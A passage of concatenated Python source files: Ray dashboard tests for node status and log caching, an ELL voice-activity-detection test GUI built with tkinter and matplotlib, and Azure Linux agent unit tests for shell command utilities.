"include_dashboard": True
}], indirect=True)
def test_multi_nodes_info(enable_test_module, disable_aiohttp_cache,
ray_start_cluster_head):
cluster: Cluster = ray_start_cluster_head
assert (wait_until_server_available(cluster.webui_url) is True)
webui_url = cluster.webui_url
webui_url = format_web_url(webui_url)
cluster.add_node()
cluster.add_node()
def _check_nodes():
try:
response = requests.get(webui_url + "/nodes?view=summary")
response.raise_for_status()
summary = response.json()
assert summary["result"] is True, summary["msg"]
summary = summary["data"]["summary"]
assert len(summary) == 3
for node_info in summary:
node_id = node_info["raylet"]["nodeId"]
response = requests.get(webui_url + f"/nodes/{node_id}")
response.raise_for_status()
detail = response.json()
assert detail["result"] is True, detail["msg"]
detail = detail["data"]["detail"]
assert detail["raylet"]["state"] == "ALIVE"
response = requests.get(webui_url + "/test/dump?key=agents")
response.raise_for_status()
agents = response.json()
assert len(agents["data"]["agents"]) == 3
return True
except Exception as ex:
logger.info(ex)
return False
wait_for_condition(_check_nodes, timeout=15)
@pytest.mark.parametrize(
"ray_start_cluster_head", [{
"include_dashboard": True
}], indirect=True)
def test_multi_node_churn(enable_test_module, disable_aiohttp_cache,
ray_start_cluster_head):
cluster: Cluster = ray_start_cluster_head
assert (wait_until_server_available(cluster.webui_url) is True)
webui_url = format_web_url(cluster.webui_url)
def cluster_chaos_monkey():
worker_nodes = []
while True:
time.sleep(5)
if len(worker_nodes) < 2:
worker_nodes.append(cluster.add_node())
continue
should_add_node = random.randint(0, 1)
if should_add_node:
worker_nodes.append(cluster.add_node())
else:
node_index = random.randrange(0, len(worker_nodes))
node_to_remove = worker_nodes.pop(node_index)
cluster.remove_node(node_to_remove)
def get_index():
resp = requests.get(webui_url)
resp.raise_for_status()
def get_nodes():
resp = requests.get(webui_url + "/nodes?view=summary")
resp.raise_for_status()
summary = resp.json()
assert summary["result"] is True, summary["msg"]
assert summary["data"]["summary"]
t = threading.Thread(target=cluster_chaos_monkey, daemon=True)
t.start()
t_st = datetime.now()
duration = timedelta(seconds=60)
while datetime.now() < t_st + duration:
get_index()
time.sleep(2)
@pytest.mark.parametrize(
"ray_start_cluster_head", [{
"include_dashboard": True
}], indirect=True)
def test_logs(enable_test_module, disable_aiohttp_cache,
ray_start_cluster_head):
cluster = ray_start_cluster_head
assert (wait_until_server_available(cluster.webui_url) is True)
webui_url = cluster.webui_url
webui_url = format_web_url(webui_url)
nodes = ray.nodes()
assert len(nodes) == 1
node_ip = nodes[0]["NodeManagerAddress"]
@ray.remote
class LoggingActor:
def go(self, n):
i = 0
while i < n:
print(f"On number {i}")
i += 1
def get_pid(self):
return os.getpid()
la = LoggingActor.remote()
la2 = LoggingActor.remote()
la_pid = str(ray.get(la.get_pid.remote()))
la2_pid = str(ray.get(la2.get_pid.remote()))
ray.get(la.go.remote(4))
ray.get(la2.go.remote(1))
def check_logs():
node_logs_response = requests.get(
f"{webui_url}/node_logs", params={"ip": node_ip})
node_logs_response.raise_for_status()
node_logs = node_logs_response.json()
assert node_logs["result"]
assert type(node_logs["data"]["logs"]) is dict
assert all(
pid in node_logs["data"]["logs"] for pid in (la_pid, la2_pid))
assert len(node_logs["data"]["logs"][la2_pid]) == 1
actor_one_logs_response = requests.get(
f"{webui_url}/node_logs",
params={
"ip": node_ip,
"pid": str(la_pid)
})
actor_one_logs_response.raise_for_status()
actor_one_logs = actor_one_logs_response.json()
assert actor_one_logs["result"]
assert type(actor_one_logs["data"]["logs"]) is dict
assert len(actor_one_logs["data"]["logs"][la_pid]) == 4
assert wait_until_succeeded_without_exception(
check_logs, (AssertionError, ), timeout_ms=1000)
@pytest.mark.parametrize(
"ray_start_cluster_head", [{
"include_dashboard": True
}], indirect=True)
def test_logs_clean_up(enable_test_module, disable_aiohttp_cache,
ray_start_cluster_head):
"""Check if logs from the dead pids are GC'ed.
"""
cluster = ray_start_cluster_head
assert (wait_until_server_available(cluster.webui_url) is True)
webui_url = cluster.webui_url
webui_url = format_web_url(webui_url)
nodes = ray.nodes()
assert len(nodes) == 1
node_ip = nodes[0]["NodeManagerAddress"]
@ray.remote
class LoggingActor:
def go(self, n):
i = 0
while i < n:
print(f"On number {i}")
i += 1
def get_pid(self):
return os.getpid()
la = LoggingActor.remote()
la_pid = str(ray.get(la.get_pid.remote()))
ray.get(la.go.remote(1))
def check_logs():
node_logs_response = requests.get(
f"{webui_url}/node_logs", params={"ip": node_ip})
node_logs_response.raise_for_status()
node_logs = node_logs_response.json()
assert node_logs["result"]
assert la_pid in node_logs["data"]["logs"]
assert wait_until_succeeded_without_exception(
check_logs, (AssertionError, ), timeout_ms=1000)
ray.kill(la)
def check_logs_not_exist():
node_logs_response = requests.get(
f"{webui_url}/node_logs", params={"ip": node_ip})
node_logs_response.raise_for_status()
node_logs = node_logs_response.json()
assert node_logs["result"]
assert la_pid not in node_logs["data"]["logs"]
assert wait_until_succeeded_without_exception(
check_logs_not_exist, (AssertionError, ), timeout_ms=10000)
@pytest.mark.parametrize(
"ray_start_cluster_head", [{
"include_dashboard": True
}], indirect=True)
def test_logs_max_count(enable_test_module, disable_aiohttp_cache,
ray_start_cluster_head):
"""Test that each Ray worker cannot cache more than 1000 logs at a time.
"""
cluster = ray_start_cluster_head
assert (wait_until_server_available(cluster.webui_url) is True)
webui_url = cluster.webui_url
webui_url = format_web_url(webui_url)
nodes = ray.nodes()
assert len(nodes) == 1
node_ip = nodes[0]["NodeManagerAddress"]
@ray.remote
class LoggingActor:
def go(self, n):
i = 0
while i < n:
print(f"On number {i}")
i += 1
def get_pid(self):
return os.getpid()
la = LoggingActor.remote()
la_pid = str(ray.get(la.get_pid.remote()))
ray.get(la.go.remote(MAX_LOGS_TO_CACHE * LOG_PRUNE_THREASHOLD))
def check_logs():
node_logs_response = requests.get(
f"{webui_url}/node_logs", params={"ip": node_ip})
node_logs_response.raise_for_status()
node_logs = node_logs_response.json()
assert node_logs["result"]
assert type(node_logs["data"]["logs"]) is dict
assert la_pid in node_logs["data"]["logs"]
log_lengths = len(node_logs["data"]["logs"][la_pid])
assert log_lengths >= MAX_LOGS_TO_CACHE
assert log_lengths <= MAX_LOGS_TO_CACHE * LOG_PRUNE_THREASHOLD
actor_one_logs_response = requests.get(
f"{webui_url}/node_logs",
params={
"ip": node_ip,
"pid": str(la_pid)
})
actor_one_logs_response.raise_for_status()
actor_one_logs = actor_one_logs_response.json()
assert actor_one_logs["result"]
assert type(actor_one_logs["data"]["logs"]) is dict
log_lengths = len(actor_one_logs["data"]["logs"][la_pid])
assert log_lengths >= MAX_LOGS_TO_CACHE
assert log_lengths <= MAX_LOGS_TO_CACHE * LOG_PRUNE_THREASHOLD
assert wait_until_succeeded_without_exception(
check_logs, (AssertionError, ), timeout_ms=10000)
if __name__ == "__main__":
sys.exit(pytest.main(["-v", __file__]))
|
vad_test.py
|
#!/usr/bin/env python3
###################################################################################################
##
## Project: Embedded Learning Library (ELL)
## File: vad_test.py
## Authors: Chris Lovett
##
## Requires: Python 3.x, numpy, tkinter, matplotlib
##
###################################################################################################
import argparse
import json
import os
import sys
from threading import Thread, Lock, get_ident
import tkinter as tk
from tkinter import BOTH, LEFT, RIGHT, TOP, BOTTOM, RAISED, X, N, END
from tkinter import Text
from tkinter.ttk import Frame, LabelFrame, Button, Style, Label, Entry
import numpy as np
import matplotlib
# Embedding matplotlib plots in tkinter views requires using the "TkAgg" backend
matplotlib.use("TkAgg")
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg
from matplotlib.figure import Figure
import matplotlib.pyplot as pyplot
import matplotlib.animation as animation
import featurizer
import wav_reader
import speaker
import microphone
import vad
class VadTest(Frame):
""" A demo application class that provides simple GUI for testing voice activity detection on microphone or wav file input. """
def __init__(self, featurizer_path, input_device, wav_file, sample_rate):
""" Initialize the VadTest object
featurizer_path - path to the ELL featurizer to use
input_device - id of the microphone to use
wav_file - optional wav_file to use when you click play
sample_rate - the sample rate to resample the incoming audio
"""
super().__init__()
self.FEATURIZER_PATH_KEY = "featurizer_path"
self.WAV_FILE_KEY = "wav_file"
self.main_thread = get_ident()
self.output_clear_time = 5000
self.channels = 1
self.init_ui()
self.get_settings_file_name()
self.load_settings()
self.max_spectrogram_width = 120
self.spectrogram_image = None
self.spectrogram_image_data = None
self.show_spectrogram = True
self.colormap_name = "inferno"
self.min_value = 0.0
self.max_value = 1.0
self.update_minmax = True
self.levels = []
self.signals = []
self.featurizer_path = None
self.featurizer = None
self.reading_input = False
# Threads
self.read_input_thread = None
self.lock = Lock()
self.main_thread = get_ident()
self.message_queue = []
self.animation = None
# featurizer
if featurizer_path:
self.featurizer_path = featurizer_path
self.settings[self.FEATURIZER_PATH_KEY] = featurizer_path
elif self.FEATURIZER_PATH_KEY in self.settings:
self.featurizer_path = self.settings[self.FEATURIZER_PATH_KEY]
self.sample_rate = sample_rate
self.input_device = input_device
self.wav_filename = None
self.wav_file = None
if wav_file:
self.wav_filename = wav_file
self.settings[self.WAV_FILE_KEY] = wav_file
if self.wav_filename is None and self.WAV_FILE_KEY in self.settings:
self.wav_filename = self.settings[self.WAV_FILE_KEY]
self.wav_file_list = None
self.speaker = None
self.microphone = None
self.save_settings() # in case we just changed it.
if self.featurizer_path:
self.load_featurizer_model(os.path.abspath(self.featurizer_path))
else:
self.show_output("Please specify and load a feature model")
self.update_ui()
def init_ui(self):
self.master.title("VAD Test")
self.pack(side="top", fill=BOTH, expand=True)
# VAD Controls section for controlling these VAD settings:
controls_frame = LabelFrame(self, text="Controls", height=30)
Label(controls_frame, text="tau_up:").grid(row=0,column=0)
self.tau_up = Entry(controls_frame, width=15)
self.tau_up.grid(row=1,column=0)
Label(controls_frame, text="tau_down:").grid(row=0,column=1)
self.tau_down = Entry(controls_frame, width=15)
self.tau_down.grid(row=1,column=1)
Label(controls_frame, text="threshold_up:").grid(row=0,column=2)
self.threshold_up = Entry(controls_frame, width=15)
self.threshold_up.grid(row=1,column=2)
Label(controls_frame, text="threshold_down:").grid(row=0,column=3)
self.threshold_down = Entry(controls_frame, width=15)
self.threshold_down.grid(row=1,column=3)
Label(controls_frame, text="large_input:").grid(row=0,column=4)
self.large_input = Entry(controls_frame, width=15)
self.large_input.grid(row=1,column=4)
Label(controls_frame, text="gain_att:").grid(row=0,column=5)
self.gain_att = Entry(controls_frame, width=15)
self.gain_att.grid(row=1,column=5)
Label(controls_frame, text="level_threshold:").grid(row=0,column=6)
self.level_threshold = Entry(controls_frame, width=15)
self.level_threshold.grid(row=1,column=6)
controls_frame.pack(side=TOP)
# Input section
input_frame = LabelFrame(self, text="Input")
input_frame.bind("-", self.on_minus_key)
input_frame.bind("+", self.on_plus_key)
input_frame.pack(fill=X)
self.play_button = Button(input_frame, text="Play", command=self.on_play_button_click)
self.play_button.pack(side=RIGHT, padx=4)
self.rec_button = Button(input_frame, text="Rec", command=self.on_rec_button_click)
self.rec_button.pack(side=RIGHT, padx=4)
self.wav_filename_entry = Entry(input_frame, width=24)
self.wav_filename_entry.pack(fill=X)
self.wav_filename_entry.delete(0, END)
# Feature section
features_frame = LabelFrame(self, text="Features")
features_frame.pack(fill=X)
features_control_frame = Frame(features_frame)
features_control_frame.pack(fill=X)
load_features_button = Button(features_control_frame, text="Load", command=self.on_load_featurizer_model)
load_features_button.pack(side=RIGHT)
self.features_entry = Entry(features_control_frame, width=8)
self.features_entry.pack(fill=X)
self.features_entry.delete(0, END)
viz_frame = Frame(features_frame)
viz_frame.bind("%w", self.on_resized)
viz_frame.pack(fill=X)
self.features_figure = Figure(figsize=(5, 4), dpi=96)
self.subplot = self.features_figure.add_subplot(211)
self.subplot2 = self.features_figure.add_subplot(212)
self.canvas = FigureCanvasTkAgg(self.features_figure, master=viz_frame)
self.canvas.draw()
self.canvas.show()
self.canvas.get_tk_widget().pack(side=TOP, fill=BOTH, expand=True)
# Output section
output_frame = LabelFrame(self, text="Output")
output_frame.pack(fill=BOTH, expand=True)
self.bind("<Configure>", self.on_resized)
self.output_text = Text(output_frame)
self.output_text.pack(fill=BOTH, padx=4, expand=True)
def on_resized(self, event):
window_size = event.width
box = self.spectrogram_image.get_window_extent()
scale = (box.x1 - box.x0) / self.max_spectrogram_width
self.max_spectrogram_width = int((window_size * 0.8) / scale)
self.setup_spectrogram_image();
def load_featurizer_model(self, featurizer_path):
""" load the given compiled ELL featurizer for use in processing subsequent audio input """
if featurizer_path:
self.featurizer = featurizer.AudioTransform(featurizer_path, 40)
self.setup_spectrogram_image()
self.vad = vad.VoiceActivityDetector(self.sample_rate, self.featurizer.output_size)
self.show_output("Feature input size: {}, output size: {}".format(
self.featurizer.input_size,
self.featurizer.output_size))
self.init_data()
def setup_spectrogram_image(self):
""" this need to be called if you load a new feature model, because the featurizer output size might have
changed. """
if self.featurizer:
dim = (self.featurizer.output_size, self.max_spectrogram_width)
self.spectrogram_image_data = np.zeros(dim, dtype=float)
self.subplot.clear()
self.spectrogram_image = self.subplot.imshow(self.spectrogram_image_data, vmin=self.min_value,
vmax=self.max_value, origin="lower", animated=True, cmap=pyplot.get_cmap(self.colormap_name))
def accumulate_spectrogram_image(self, feature_data):
""" accumulate the feature data into the spectrogram image """
image_data = self.spectrogram_image_data
feature_data = np.reshape(feature_data, [-1,1])
new_image = np.hstack((image_data, feature_data))[:,-image_data.shape[1]:]
image_data[:,:] = new_image
def set_spectrogram_image(self):
""" update the spectrogram image and the min/max values """
self.lock.acquire() # protect access to the shared state
if self.update_minmax and self.show_spectrogram:
min_value = np.min(self.spectrogram_image_data)
max_value = np.max(self.spectrogram_image_data)
if np.isfinite(min_value) and np.isfinite(max_value):
self.min_value = min_value
self.max_value = max_value
eps = 0.1
if self.max_value - self.min_value < eps:
self.max_value = self.min_value + eps
self.spectrogram_image.set_clim(self.min_value, self.max_value)
self.spectrogram_image.set_data(self.spectrogram_image_data)
self.lock.release()
def on_load_featurizer_model(self):
""" called when user clicks the Load button for the feature model """
filename = self.features_entry.get()
filename = filename.strip('"')
self.featurizer_path = filename
self.get_sample_rate()
self.settings[self.FEATURIZER_PATH_KEY] = filename
self.save_settings()
self.stop()
self.load_featurizer_model(filename)
def set_entry(self, e, value):
s = str(value)
if e.get() != s:
e.delete(0,END)
e.insert(0, s)
def update_ui(self):
self.set_entry(self.wav_filename_entry, self.wav_filename)
self.set_entry(self.features_entry, self.featurizer_path)
self.set_entry(self.tau_up, vad.DEFAULT_TAU_UP)
self.set_entry(self.tau_down, vad.DEFAULT_TAU_DOWN)
self.set_entry(self.threshold_up, vad.DEFAULT_THRESHOLD_UP)
self.set_entry(self.threshold_down, vad.DEFAULT_THRESHOLD_DOWN)
self.set_entry(self.large_input, vad.DEFAULT_LARGE_INPUT)
self.set_entry(self.gain_att, vad.DEFAULT_GAIN_ATT)
self.set_entry(self.level_threshold, vad.DEFAULT_LEVEL_THRESHOLD)
def init_data(self):
""" initialize the spectrogram_image_data based on the newly loaded model info """
if self.featurizer:
dim = (self.featurizer.output_size, self.max_spectrogram_width)
self.spectrogram_image_data = np.zeros(dim, dtype=float)
if self.spectrogram_image is not None:
self.spectrogram_image.set_data(self.spectrogram_image_data)
def get_settings_file_name(self):
""" this app stores the various UI field values in a settings file in your temp folder
so you don't always have to specify the full command line options """
import tempfile
temp = tempfile.gettempdir()
self.settings_file_name = os.path.join(temp, "ELL", "Audio", "vad_test.json")
def load_settings(self):
""" load the previously saved settings from disk, if any """
self.settings = {}
try:
if os.path.isfile(self.settings_file_name):
with open(self.settings_file_name, "r") as f:
self.settings = json.load(f)
except:
self.show_output("error loading settings: {}".format(self.settings_file_name))
self.settings = {}
def save_settings(self):
""" save the current settings to disk """
settings_dir = os.path.dirname(self.settings_file_name)
if not os.path.isdir(settings_dir):
os.makedirs(settings_dir)
with open(self.settings_file_name, "w") as f:
f.write(json.dumps(self.settings))
def on_rec_button_click(self):
""" called when user clicks the record button, same button is used to "stop" recording. """
if self.rec_button["text"] == "Rec":
self.rec_button["text"] = "Stop"
self.play_button["text"] = "Play"
self.start_recording()
else:
self.rec_button["text"] = "Rec"
self.on_stopped()
def on_play_button_click(self):
""" called when user clicks the record button, same button is used to "stop" playback """
if self.play_button["text"] == "Play":
self.play_button["text"] = "Stop"
self.rec_button["text"] = "Rec"
self.on_play()
else:
self.play_button["text"] = "Play"
self.on_stopped()
def on_play(self):
""" called when user clicks the Play button """
filename = self.wav_filename_entry.get()
filename = filename.strip('"')
self.wav_filename = filename
self.settings[self.WAV_FILE_KEY] = filename
self.save_settings()
self.start_playing(filename)
def on_stop(self):
""" called when user clicks the Stop button """
self.reading_input = False
if self.wav_file:
self.wav_file.close()
self.wav_file = None
if self.read_input_thread:
self.read_input_thread.join()
self.read_input_thread = None
self.stop()
def on_stopped(self):
""" called when we reach the end of the wav file playback """
self.play_button["text"] = "Play"
self.on_stop()
self.subplot2.clear()
if (len(self.levels) > 0):
levels = np.array(self.levels)
levels /= np.max(levels)
signals = np.array(self.signals)
self.subplot2.plot(levels)
self.subplot2.plot(signals)
self.vad.reset()
self.canvas.draw()
self.canvas.show()
self.levels = []
self.signals = []
def stop(self):
""" called when user clicks the stop button, or we reach the end of a wav file input """
# close streams
if self.animation:
self.animation.event_source.stop()
self.animation = None
if self.microphone:
self.microphone.close()
if self.speaker:
self.speaker.close()
if self.wav_file:
self.wav_file.close()
self.wav_file = None
self.reading_input = False
def get_wav_list(self):
if self.wav_filename and os.path.isfile(self.wav_filename):
full_path = os.path.abspath(self.wav_filename)
dir_name = os.path.dirname(full_path)
if not self.wav_file_list:
print("wav file name: {}".format(full_path))
print("looking for wav files in: {}".format(dir_name))
self.wav_file_list = [x for x in os.listdir(dir_name) if os.path.splitext(x)[1] == ".wav"]
self.wav_file_list.sort()
return self.wav_file_list
def select_wav_file(self, filename):
self.wav_filename = filename
# show the file in the UI
self.wav_filename_entry.delete(0, END)
if self.wav_filename:
self.wav_filename_entry.insert(0, self.wav_filename)
# and automatically play the file.
self.on_play()
def on_minus_key(self, event):
""" When user presses the plus button we reverse to the previous wav file in the current folder.
This way you can easily step through all the training wav files """
if self.get_wav_list():
i = self.wav_file_list.index(os.path.basename(self.wav_filename))
if i - 1 >= 0:
next_wav_file = self.wav_file_list[i - 1]
dir_name = os.path.dirname(self.wav_filename)
self.select_wav_file(os.path.join(dir_name, next_wav_file))
def on_plus_key(self, event):
""" When user presses the plus button we advance to the next wav file in the current folder.
This way you can easily step through all the training wav files """
if self.get_wav_list():
i = self.wav_file_list.index(os.path.basename(self.wav_filename))
if i + 1 < len(self.wav_file_list):
next_wav_file = self.wav_file_list[i + 1]
dir_name = os.path.dirname(self.wav_filename)
self.select_wav_file(os.path.join(dir_name, next_wav_file))
def clear_output(self):
""" remove some of the Output based a the timeout callback """
self.output_text.delete(1.0, 2.0)
def process_output(self):
""" show output that was queued by background thread """
self.lock.acquire()
messages = self.message_queue
self.message_queue = []
self.lock.release()
for msg in messages:
self.show_output(msg)
def show_output(self, message):
""" show output message, or queue it if we are on a background thread """
if self.main_thread != get_ident():
self.message_queue += [message]
return
for line in str(message).split('\n'):
self.output_text.insert(END, "{}\n".format(line))
self.output_text.see("end") # scroll to end
self.after(self.output_clear_time, self.clear_output)
def start_playing(self, filename):
""" Play a wav file, and classify the audio. Note we use a background thread to read the
wav file and we setup a UI animation function to draw the sliding spectrogram image, this way
the UI update doesn't interfere with the smoothness of the audio playback """
if self.speaker is None:
self.speaker = speaker.Speaker()
self.stop()
self.reading_input = False
self.wav_file = wav_reader.WavReader(self.sample_rate, self.channels)
self.wav_file.open(filename, self.featurizer.input_size, self.speaker)
self.setup_spectrogram_image()
def update_func(frame_index):
self.process_output()
if not self.reading_input:
self.after(1, self.on_stopped)
self.set_spectrogram_image()
return (self.spectrogram_image,)
if self.animation:
self.animation.event_source.stop()
self.reading_input = True
# Start animation timer for updating the UI (e.g. spectrogram image) (30 fps is usually fine)
self.animation = animation.FuncAnimation(self.features_figure, update_func, interval=33, blit=True)
# start background thread to read and classify the audio.
self.featurizer.open(self.wav_file)
self.read_input_thread = Thread(target=self.on_read_features, args=())
self.read_input_thread.daemon = True
self.read_input_thread.start()
def start_recording(self):
""" Start recording audio from the microphone nd classify the audio. Note we use a background thread to
process the audio and we setup a UI animation function to draw the sliding spectrogram image, this way
the UI update doesn't interfere with the smoothness of the microphone readings """
if self.microphone is None:
self.microphone = microphone.Microphone(False)
self.stop()
num_channels = 1
self.microphone.open(self.featurizer.input_size, self.sample_rate, num_channels, self.input_device)
def update_func(frame_index):
# this is an animation callback to update the UI every 33 milliseconds.
self.process_output()
self.set_spectrogram_image()
if not self.reading_input:
self.after(1, self.on_stopped)
return (self.spectrogram_image,)
if self.animation:
self.animation.event_source.stop()
self.reading_input = True
# Start animation timer for updating the UI (e.g. spectrogram image) (30 fps is usually fine)
self.animation = animation.FuncAnimation(self.features_figure, update_func, interval=33, blit=True)
# start background thread to read and classify the recorded audio.
self.featurizer.open(self.microphone)
self.read_input_thread = Thread(target=self.on_read_features, args=())
self.read_input_thread.daemon = True
self.read_input_thread.start()
def on_read_features(self):
""" this is the background thread entry point. So we read the feature data in a loop """
try:
while self.reading_input and self.featurizer:
feature_data = self.featurizer.read()
if feature_data is None:
break # eof
else:
signal = self.vad.process(feature_data)
self.levels += [ self.vad.level ]
self.signals += [ signal ]
self.lock.acquire()
if self.show_spectrogram:
self.accumulate_spectrogram_image(feature_data)
self.lock.release()
except:
errorType, value, traceback = sys.exc_info()
print("### Exception reading input: " + str(errorType) + ": " + str(value) + " " + str(traceback))
while traceback:
print(traceback.tb_frame.f_code)
traceback = traceback.tb_next
self.reading_input = False
def main(featurizer, input_device, wav_file, sample_rate):
""" Main function to create root UI and AudioDemo object, then run the main UI loop """
root = tk.Tk()
root.geometry("800x800")
app = VadTest(featurizer, input_device, wav_file, sample_rate)
root.bind("+", app.on_plus_key)
root.bind("-", app.on_minus_key)
while True:
try:
root.mainloop()
break
except UnicodeDecodeError:
pass
if __name__ == "__main__":
arg_parser = argparse.ArgumentParser(description="Test a feature model and optional classifier in a handy GUI app")
# options
arg_parser.add_argument("--featurizer", "-m", help="Compiled ELL model to use for generating features", default=None)
arg_parser.add_argument("--input_device", "-d", help="Index of input device (see --list_devices)", default=1, type=int)
arg_parser.add_argument("--list_devices", help="List available input devices", action="store_true")
arg_parser.add_argument("--wav_file", help="Provide an input wav file to test", default=None)
arg_parser.add_argument("--sample_rate", type=int, help="The sample rate that featurizer is setup to use", default=16000)
args = arg_parser.parse_args()
if args.list_devices:
microphone.list_devices()
else:
main(args.featurizer, args.input_device, args.wav_file, args.sample_rate)
|
test_shell_util.py
|
# -*- coding: utf-8 -*-
# Copyright 2018 Microsoft Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Requires Python 2.6+ and Openssl 1.0+
#
import os
import signal
import subprocess
import tempfile
import threading
import unittest
from azurelinuxagent.common.future import ustr
import azurelinuxagent.common.utils.shellutil as shellutil
from tests.tools import AgentTestCase, patch
from tests.utils.miscellaneous_tools import wait_for, format_processes
class ShellQuoteTestCase(AgentTestCase):
def test_shellquote(self):
self.assertEqual("\'foo\'", shellutil.quote("foo"))
self.assertEqual("\'foo bar\'", shellutil.quote("foo bar"))
self.assertEqual("'foo'\\''bar'", shellutil.quote("foo\'bar"))
class RunTestCase(AgentTestCase):
def test_it_should_return_the_exit_code_of_the_command(self):
exit_code = shellutil.run("exit 123")
self.assertEqual(123, exit_code)
def test_it_should_be_a_pass_thru_to_run_get_output(self):
with patch.object(shellutil, "run_get_output", return_value=(0, "")) as mock_run_get_output:
shellutil.run("echo hello word!", chk_err=False, expected_errors=[1, 2, 3])
self.assertEqual(mock_run_get_output.call_count, 1)
args, kwargs = mock_run_get_output.call_args
self.assertEqual(args[0], "echo hello word!")
self.assertEqual(kwargs["chk_err"], False)
self.assertEqual(kwargs["expected_errors"], [1, 2, 3])
class RunGetOutputTestCase(AgentTestCase):
def test_run_get_output(self):
output = shellutil.run_get_output(u"ls /")
self.assertNotEqual(None, output)
self.assertEqual(0, output[0])
err = shellutil.run_get_output(u"ls /not-exists")
self.assertNotEqual(0, err[0])
err = shellutil.run_get_output(u"ls 我")
self.assertNotEqual(0, err[0])
def test_it_should_log_the_command(self):
command = "echo hello world!"
with patch("azurelinuxagent.common.utils.shellutil.logger", autospec=True) as mock_logger:
shellutil.run_get_output(command)
self.assertEqual(mock_logger.verbose.call_count, 1)
args, kwargs = mock_logger.verbose.call_args # pylint: disable=unused-variable
command_in_message = args[1]
self.assertEqual(command_in_message, command)
def test_it_should_log_command_failures_as_errors(self):
return_code = 99
command = "exit {0}".format(return_code)
with patch("azurelinuxagent.common.utils.shellutil.logger", autospec=True) as mock_logger:
shellutil.run_get_output(command, log_cmd=False)
self.assertEqual(mock_logger.error.call_count, 1)
args, _ = mock_logger.error.call_args
message = args[0] # message is similar to "Command: [exit 99], return code: [99], result: []"
self.assertIn("[{0}]".format(command), message)
self.assertIn("[{0}]".format(return_code), message)
self.assertEqual(mock_logger.info.call_count, 0, "Did not expect any info messages. Got: {0}".format(mock_logger.info.call_args_list))
self.assertEqual(mock_logger.warn.call_count, 0, "Did not expect any warnings. Got: {0}".format(mock_logger.warn.call_args_list))
def test_it_should_log_expected_errors_as_info(self):
return_code = 99
command = "exit {0}".format(return_code)
with patch("azurelinuxagent.common.utils.shellutil.logger", autospec=True) as mock_logger:
shellutil.run_get_output(command, log_cmd=False, expected_errors=[return_code])
self.assertEqual(mock_logger.info.call_count, 1)
args, _ = mock_logger.info.call_args
message = args[0] # message is similar to "Command: [exit 99], return code: [99], result: []"
self.assertIn("[{0}]".format(command), message)
self.assertIn("[{0}]".format(return_code), message)
self.assertEqual(mock_logger.warn.call_count, 0, "Did not expect any warnings. Got: {0}".format(mock_logger.warn.call_args_list))
self.assertEqual(mock_logger.error.call_count, 0, "Did not expect any errors. Got: {0}".format(mock_logger.error.call_args_list))
def test_it_should_log_unexpected_errors_as_errors(self):
return_code = 99
command = "exit {0}".format(return_code)
with patch("azurelinuxagent.common.utils.shellutil.logger", autospec=True) as mock_logger:
shellutil.run_get_output(command, log_cmd=False, expected_errors=[return_code + 1])
self.assertEqual(mock_logger.error.call_count, 1)
args, _ = mock_logger.error.call_args
message = args[0] # message is similar to "Command: [exit 99], return code: [99], result: []"
self.assertIn("[{0}]".format(command), message)
self.assertIn("[{0}]".format(return_code), message)
self.assertEqual(mock_logger.info.call_count, 0, "Did not expect any info messages. Got: {0}".format(mock_logger.info.call_args_list))
self.assertEqual(mock_logger.warn.call_count, 0, "Did not expect any warnings. Got: {0}".format(mock_logger.warn.call_args_list))
class RunCommandTestCase(AgentTestCase):
"""
Tests for shellutil.run_command/run_pipe
"""
def __create_tee_script(self, return_code=0):
"""
Creates a Python script that tees its stdin to stdout and stderr
"""
tee_script = os.path.join(self.tmp_dir, "tee.py")
AgentTestCase.create_script(tee_script, """
import sys
for line in sys.stdin:
sys.stdout.write(line)
sys.stderr.write(line)
exit({0})
""".format(return_code))
return tee_script
def test_run_command_should_execute_the_command(self):
command = ["echo", "-n", "A TEST STRING"]
ret = shellutil.run_command(command)
self.assertEqual(ret, "A TEST STRING")
def test_run_command_should_use_popen_arg_list(self):
with patch("azurelinuxagent.common.utils.shellutil.subprocess.Popen", wraps=subprocess.Popen) as popen_patch:
command = ["echo", "-n", "A TEST STRING"]
ret = shellutil.run_command(command)
self.assertEqual(ret, "A TEST STRING")
self.assertEqual(popen_patch.call_count, 1)
args, kwargs = popen_patch.call_args
self.assertTrue(any(arg for arg in args[0] if "A TEST STRING" in arg), "command not being used")
self.assertEqual(kwargs['env'].get(shellutil.PARENT_PROCESS_NAME), shellutil.AZURE_GUEST_AGENT,
"Env flag not being used")
def test_run_pipe_should_execute_a_pipe_with_two_commands(self):
# Output the same string 3 times and then remove duplicates
test_string = "A TEST STRING\n"
pipe = [["echo", "-n", "-e", test_string * 3], ["uniq"]]
output = shellutil.run_pipe(pipe)
self.assertEqual(output, test_string)
def test_run_pipe_should_execute_a_pipe_with_more_than_two_commands(self):
#
# The test pipe splits the output of "ls" in lines and then greps for "."
#
# Sample output of "ls -d .":
# drwxrwxr-x 13 nam nam 4096 Nov 13 16:54 .
#
pipe = [["ls", "-ld", "."], ["sed", "-r", "s/\\s+/\\n/g"], ["grep", "\\."]]
output = shellutil.run_pipe(pipe)
self.assertEqual(".\n", output, "The pipe did not produce the expected output. Got: {0}".format(output))
def __it_should_raise_an_exception_when_the_command_fails(self, action):
with self.assertRaises(shellutil.CommandError) as context_manager:
action()
exception = context_manager.exception
self.assertIn("tee.py", str(exception), "The CommandError does not include the expected command")
self.assertEqual(1, exception.returncode, "Unexpected return value from the test pipe")
self.assertEqual("TEST_STRING\n", exception.stdout, "Unexpected stdout from the test pipe")
self.assertEqual("TEST_STRING\n", exception.stderr, "Unexpected stderr from the test pipe")
def test_run_command_should_raise_an_exception_when_the_command_fails(self):
tee_script = self.__create_tee_script(return_code=1)
self.__it_should_raise_an_exception_when_the_command_fails(
lambda: shellutil.run_command(tee_script, input="TEST_STRING\n"))
def test_run_pipe_should_raise_an_exception_when_the_last_command_fails(self):
tee_script = self.__create_tee_script(return_code=1)
self.__it_should_raise_an_exception_when_the_command_fails(
lambda: shellutil.run_pipe([["echo", "-n", "TEST_STRING\n"], [tee_script]]))
def __it_should_raise_an_exception_when_it_cannot_execute_the_command(self, action):
with self.assertRaises(Exception) as context_manager:
action()
exception = context_manager.exception
self.assertIn("No such file or directory", str(exception))
